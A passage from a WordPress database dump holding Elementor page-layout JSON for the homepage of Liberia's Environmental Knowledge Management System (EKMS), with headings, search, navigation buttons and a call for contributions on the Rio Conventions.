"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Click me\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5854,523,'_elementor_version','2.7.5'),(5855,523,'_elementor_template_type','wp-page'),(5857,524,'_wp_page_template','default'),(5858,524,'_elementor_edit_mode','builder'),(5859,524,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Click me\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5860,524,'_elementor_version','2.7.5'),(5861,524,'_elementor_template_type','wp-page'),(5863,525,'_wp_page_template','default'),(5864,525,'_elementor_edit_mode','builder'),(5865,525,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center 